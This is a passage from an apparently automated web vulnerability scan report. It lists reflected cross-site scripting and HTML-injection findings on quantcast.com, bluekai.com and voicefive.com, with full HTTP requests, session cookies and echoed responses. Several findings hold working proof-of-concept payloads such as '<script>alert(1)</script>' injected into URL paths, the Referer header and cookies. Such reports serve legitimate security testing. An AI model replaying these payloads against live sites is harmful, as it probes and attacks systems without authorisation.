Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; qcVisitor=2|77|1296918427290|22|NOTSET; JSESSIONID=62752451072D3981C24D0EB3AF9F17D7; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.9.8.1297448239075; qcPageID=0

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" user widgetImagebf23b"><a>da5033b7489" />
...[SNIP]...

1.155. http://www.quantcast.com/wpapi/menus [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/wpapi/menus

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c94d4"><a>a73feb5dc1c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wpapic94d4"><a>a73feb5dc1c/menus HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.1.10.1297448142; qcVisitor=2|77|1296918427290|15|NOTSET; JSESSIONID=3F6D98FAA44E28DAD1DA690E50F518DB

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E4843BF506CDD7F91BF54B14EAFDFCCF; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" wpapic94d4"><a>a73feb5dc1c menus" />
...[SNIP]...

1.156. http://www.quantcast.com/wpapi/related-links [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/wpapi/related-links

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7d33d<a>c54ad6cb153 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wpapi7d33d<a>c54ad6cb153/related-links?num=5&terms%5B0%5D=important&terms%5B1%5D=logged+in&terms%5B2%5D=logged+out&terms%5B3%5D=technical&terms%5B4%5D=publisher HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.1.10.1297448142; qcVisitor=2|77|1296918427290|15|NOTSET; JSESSIONID=3F6D98FAA44E28DAD1DA690E50F518DB

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=490DE51A74B1DD6F781F3EDA0A27D7B5; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> wpapi7d33d<a>c54ad6cb153 related-links</em>
...[SNIP]...

1.157. http://www.quantcast.com/wpapi/related-links [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/wpapi/related-links

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d6e5"><a>e4b7ea0b5c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wpapi6d6e5"><a>e4b7ea0b5c8/related-links?num=5&terms%5B0%5D=important&terms%5B1%5D=logged+in&terms%5B2%5D=logged+out&terms%5B3%5D=technical&terms%5B4%5D=publisher HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.1.10.1297448142; qcVisitor=2|77|1296918427290|15|NOTSET; JSESSIONID=3F6D98FAA44E28DAD1DA690E50F518DB

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0596B7B494FA8288C7F5CE6391989E10; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" wpapi6d6e5"><a>e4b7ea0b5c8 related-links" />
...[SNIP]...

1.158. http://tags.bluekai.com/site/50 [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/50

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 243c4'-alert(1)-'d364363071b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /site/50?ret=html&limit=4&btp=1&phint=kw%3D&phint=eid%3D283&phint=a%3D-1&phint=g%3D0&uhint=zip%3D0&phint=tcat%3D152869&phint=kh%3DDBDCB53F2576976D806D6498794024FC&phint=bread%3D[Jewelry%20&%20Watches,%20Engagement%20&%20Wedding,%20Engagement%20Rings,%20Diamond,%20Diamond%20Solitaire%20with%20Accents]&phint=bin%3D1499.99&phint=asp%3DMain%20Stone%20Shape,Heart,Main%20Stone%20Treatment,Not%20Enhanced,Carat%20Total%20Weight,0.90%20-%201.39,Exact%20Carat%20Total%20Weight,.90,Main%20Stone%20Certification/Grading,EGL%20USA,Metal,14k%20White%20Gold,Metal%20Purity,14k,Ring%20Size,6,Main%20Stone,Diamond,Style,Engagement,Jewelry%20Type,Ring,Size,6,Gender,Women's HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=243c4'-alert(1)-'d364363071b
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJpE8VaQtwGt6JKHRxRlMYUehXOxymGwj1kYVzy1cny1eOvulA9hDSeRPV+7/WLPvwqdoutxBRZBQKWJA1UsT16n1RVJxRTw/Lq/z9zrJQADu2UU9GGO9BVGsj1=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqEpyKodzE/yKnx01sh2sIMfjIUcuf8JY4RytoXJocT5DctrzWZ/C0sbK2ePQXh7RgC+0L9x8KcakQaVeNEm/1Q9142UU5SKALAj2M9Ss/O92Xrq1EOyj+fAFsK1ga8Y6+FlbIlgMzPrn4RysZQTD/VxOxBe+jJgTxoEjwDQdf3okMnBTLit+ffFlpL2gXQIevpK0ovOTKYwx18+oieUQ40fB/AOEO+Px+yP5K10UfNFZltN0eglCNPEGwgLQwoY7sRf7WSh8pdxc7Hd89wP1pBy95DFZKI5GtAOLQzDEGTBes9bojZOTErVXBGaNk53pzYyTrRbnkzn2wC9+yKA7GmCsvCKu0JDqg/kLgrrVMFedxXhFX9Ii9cAAg292ERp5HHUtSvcafg8Y8C9bodR1EeWdmq1+qRc3V4CjVYx71w/D1e3fXr9O3EOTxxYJH4t0pZuGJb8qurnsNQ296i2micNHGa1z5L5xvTeZEdJOsJwbAoYI3uXKM69XKMhg9==; bklc=4d55308f; bk=yQSpJZmZF9ysHNJo; bkc=KJh5NP+/asWD9m9pK2w55z7yxq5kYXJqAZD3VakKDFOuZ67KWSNyaTBWnSiAF/u/kWoCxQd5/R1/BJ9GLGH1GG59Y/EYY//GCRo/0FOOmt5tdoA8dXwmXrtz1dd+pakda/eco6YG+MvQ9/94fjjzqyw59hS9wj69SNVs1Nv8vNlzkYIziJXzpaX0rzgaUuZjXGDc/XnKZZTT+TWfEfvd6lOUJ/92VRaBJd1e5iiL/e23OKRh0EuKXWBUtJ4EyLXMjd5hE6yRc7/9MBECdCDKekQ6clHp3drgKzDJT1n24d0MU167aIwppubx7BfOwU31rbvOm24nfRFkd+qBwHfAoFAv+IeatGmdJKpcIz4T0cH4KOG2FQsQflhry9jFe8ecJamXXWRwxWtY9AIfXlYdqxUAfNQWjkmXXOSLp6rBYkCV0+E8AJ+2lYcJkYXziKF8CwF8L2gyC5wzwj/oU2isXyA2DveBqMQGrDZ02yql0IFzy87zcIv8X0XY1XNcKOFVlpbXcp/8UfJSq8GcLHSU/CuR4HlxdPL0hxLlR8WroQezwZPTxEnaY8dxpFKZ8i5tQvkS4WdmkVO2U/AZ6d+QBLDnlX42ELnlBlbCamFebuO4fK9KkAp8yAKNXPK4oVs2EnSEqy6R7LETsz0wXNv2mGeXuMnkYX2Mw8C+Ol9rkbgg/q2o8SjTTHazZ0BuQzyaybAfQJ7iCSKNXp7pl7YmZp+3tgYEpgKcrbZUKI3STK5GsIqw70lHlqIjZXRUo7pbfGXgDClW0ICbl1mi9+llJamIXOeVjp7Vz0ntp0i/PHNvTvjTTPazbtfzgfUaFVGIKS5A242W16TwV+a4EeTrrPT0Ek5lYm++gCgQlz55rr1XlJxFf1cILH3+yWhlkr8kOp4aYN5QwSu6RJdL1oyLZKva3fE8kZ7rNLjFLhorkw0Fh7Y+BHydSzAvV1sir+4w4uKeIbfArAHa20I+cM8qyLX7clJpVd2yetndWab775KX0SDjladdzL5QFhRsgEbYtNB6DpXpKyffG2AFWgZ2u5pjK5paAFNcewXchwiH2x==; bkst=KJhkAnNv96WDCxzBYYqOyk/DYyLnPIq7p+0jxixZSXyZi6Q6DjrxpHoJk/6sTb3BMSt5gteoWtQkwGYkRsV77VIQLNLJlrg07U18C8LCE8wWpF+ahzIxjfLFWv8NV0+xMQAj5ue9y9kWtcUY+QRCOOgEh4MBLd8Ub8XQGIQGsLHHqHy+IgjGZQ9aTWoEek/pQ6oydEsV0awjBYl5dK04bXzDl4hc5hqBWfX6G1KBJ7MPA323y6S840qweb35653sWAapYpbEwF4Vm6mvOq4rrANdXXugRgZNcD4fkXmTTQpgXwmNRZl8UBGHaxUeMEszYD6jYFa07uEmogJCkWFvrWODisi6W5t2cuFw8x7JAzBN+IB57HqfrN8diu4XNFJaWF4YkLwLApuP/WDnxZe/mE4/QpRLtf2v3RNK4RQndi28rkgN; bkdc=res

Response

HTTP/1.0 200 OK
Date: Fri, 11 Feb 2011 18:33:12 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=PbEVTB7F/B6sHNJo; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5NV+/PWWDOdOp524NLD3sAB30OSsgujSoRsU8u1kcquq8HgEYUxyu+SYuXCWiDi3aYUlGeukWG/aWAuPAW76/CW9GMYY/V3WiAMnXAJNp2Xfmw4BC5dl+7M1p5IfdMrA9AmEDyB2Eb5cyflHXgPmzsyd1R8czIhpzCRggq5yhys6NtRPMHIcXFkooCt/SElM99gYfWtYNuMGMkqL0QoFbC5lT0LcIJjmg/gQgaPmdXsOGyaFuoU1qrw1Drp3krX/9xo/NtcQ0lh1YCHUACbl9wvbR8CBIWOcy8qE9KmELwrfJuKACmXO/cK84TVswh4OOOfKIFTjUyQWizwX44udUIX7amnfjORgEmfCcMlaUBcOEFLhth7JdfKSKXcnEKGPqX1lSQ2XkfL4NhpMJ2nFyecoiwDe4IP0we5Tz//Xgo7gCePW9BRASwm7mydttajYdRxM1o7gCpjMwuT6SVaqv2wVxZ8lzwLUDnh0sNd1H2dBc+4ua62y2i3k4t/qgX5lUGYNWt3rTuUcXeKTUNfZc1f74Jle7UyHZVGdyPLp4UFp5jlvIRMNFCQzhi6rCsL02XQE2upcPYp5MuO5E9sb4AFRgo7gCWXq2FV7TzxM95Y6IJI5v1O2UGL76wJCB2zJMrB2JIwyZIWLhcIatX+DmfZcaNY2XNJMdl216p1+Dmd7VQwxDNL2i4NyX85Dm8JKv3P2T9zIerUS9XmPudUg/gNr83P8TOvdBc3jOokXb5ELyDflyMcadpg0Ep7ayHX8/C2w2fKarbrVKFiq2esledGVpJDclqIvZIRVo7pffTTo6Kda+5YlrRPaO6wzDDfdyWmSpcwwLhF1pWZJNIhv83P8Tav2NaIfUbr/KFjIXxfcIdXxynQ2S6j2Bw3bTUMWrBtQ48ZtIsre+C8NOh6PhDf2yaJT4db/NZmlmY7gjpAlNyCVRC8xVwYKfoJ1PDfNykqcK1Lw5hFh+PrkshU2gosr+Q4Gou8qcYCq5Fufrmh7z5hUUrqVQ4ho8IsxJMWXI8mYtdrRKhwBeK/NhFhj1nLlQdFvcmyqwStWyXrc5kC/67V5ZpIw8SwjpBl5XW75tc7KhR+zHb4Il6viF; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJhn8sPQKBWxbLFWT19WREW04muaLKb0yaM3zea5cQSsgVXeQSyjleYVBNuVZKWmn6u1iDssMTsCQBD4vYLnjEWpz9OkJuu2QVvixnsgNL89kioxfw2nV0OgWCLeyh1QiTNOMQdYRZuxOnJu2qV9n9Yp/0jj; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsn/pkOQuWkvuDT0BDTp1MDlLpxlufWy1WLh1fs61nz61E90uD+I6He3YNE1y1Sxka6zEbym9WSLsJQ=; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkp1=KJhMRZOQ19niaytCFGy199hn9A9=; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpE8tOQRsxyRZOQW9qiaytCFQhGQ/zOovvaATWCXbO1rRATi1zaaOmW3F20IloMLPrJ4qU/mFKcPuUtFWOhaGq+zQy1I+fwfw8oQ5Hp9MULZXf9T1BLf3FgnwwbAjZDwRyIyLM9y1f9q1M9XmOKR5G2qVENr8Zy3t5kZ9BDltEkGgjakhMNq9pUQafzdvJ/XhHHb+AjdQnP7yLTD1VrMbpI0D+qgm38sHhBsOiAfeZ6XXc34yae0bmPQVcgt6e4w0LdUFJBugYc6481/wUgQmopCD+Yw9pHlRmrcZxIWXB+DySsv9XF+Qhe8w9cZ4IgnZ+w0Kx1KhQBeWYQIIUBsOQT1t20lMBsPiXCbKlfaHh4n4RysZQTD/VxOxBe+jJgTDHE2wx9zDK9wRpmjyvj2xuGFFHpErQvDtEpxKcMokgvB/LMt2fbF7dF2nyiIpYyIPSVe9yc4yH0qL/y48z7e8BtK8A2M9SojtjyOv3dFX3NqJLone0UJAcXslUM1kI2qhL6FDtOZZXcPOdiBBFCB/ofdQw5QhTIIVeprRe3kXplp+s6Q/VdRy1eylzLTqXngnfDZGaChzNNUvTVbwsnqM8/wx5e1PY2kAuGUvXaz4kgAh6eQdzc++eJkLMrFtg+e92wicLvf/1Rxm7Cn2OXZ8Abi3+L6z14lE6nZWe37yeBMd7BZV++eNnw9L0AA71RsxoRdEcz/y6mEh9GrqO4poWW2zh+VN7zymGjxmgPYSAlYZuvSlK9CxXpMFxtObpIOPO5iBbWssnPFyu3IfnG5zPtO8eFxKb4j9nhHIovxrbuXrgNrm49QOj4Lwx9YAXsC7OcOGjFCdqZ99YGGDbF; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 12-Feb-2011 18:33:12 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 737
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1068244&t=2" width=1 height=1 border=0 alt="">
<img src="http://leadback.advertising.com/adcedge/lb?si
...[SNIP]...
<script>var referrer='http://www.google.com/search?hl=en&q=243c4'-alert(1)-'d364363071b'; var hashID='dbdcb53f2576976d806d6498794024fc'; var taxonomyJSON=[];</script>
...[SNIP]...

1.159. http://ar.voicefive.com/bmx3/node_hulu.pli [UID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/node_hulu.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload f15f0<script>alert(1)</script>04bbaea526f was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; UID=1d29d89e-72.246.30.75-1294456810f15f0<script>alert(1)</script>04bbaea526f

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19861

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
e);
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Buddy.cookies={ "UID": '1d29d89e-72.246.30.75-1294456810f15f0<script>alert(1)</script>04bbaea526f', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb
...[SNIP]...

1.160. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_da39f516a098b3de) ar_p68511049 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/node_hulu.pli

Issue detail

The value of the ar_da39f516a098b3de) ar_p68511049 cookie is copied into the HTML document as plain text between tags. The payload 283c1<script>alert(1)</script>01785e5a65 was submitted in the ar_da39f516a098b3de) ar_p68511049 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&283c1<script>alert(1)</script>01785e5a65; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19860

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&283c1<script>alert(1)</script>01785e5a65' };
COMSCORE.BMX.Buddy.ServerTimeEpoch="1297448662";COMSCORE.BMX.Buddy.start(({"Config":{"ControlList":[{Pid:"p75771577",RecruitFrequency:0,Inv:"inv_hulu",Version:3},{Pid:"p72205782",RecruitFrequency
...[SNIP]...

1.161. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p45555483 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/node_hulu.pli

Issue detail

The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload 8d44c<script>alert(1)</script>06dfc11ec34 was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&8d44c<script>alert(1)</script>06dfc11ec34; ar_da39f516a098b3de) ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19861

